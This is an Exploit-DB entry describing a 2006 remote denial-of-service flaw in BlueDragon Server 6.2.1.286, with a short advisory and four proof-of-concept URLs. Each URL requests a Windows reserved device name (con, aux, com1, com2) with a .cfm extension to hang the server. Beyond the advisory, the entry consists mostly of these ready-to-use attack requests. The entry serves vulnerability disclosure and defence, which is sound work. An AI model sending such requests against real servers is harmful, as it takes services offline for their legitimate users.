BlueDragon Server 6.2.1 - '.cfm' Denial of Service

EDB-ID:

28100




Platform:

CFM

Date:

2006-06-23


source: https://www.securityfocus.com/bid/18624/info

BlueDragon is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed GET requests.

An attacker can exploit this issue to cause the service to stop responding, effectively denying service to legitimate users.

This issue affects version 6.2.1.286; other versions may also be vulnerable.

http://www.example.com/con.cfm 
http://www.example.com/aux.cfm 
http://www.example.com/com1.cfm 
http://www.example.com/com2.cfm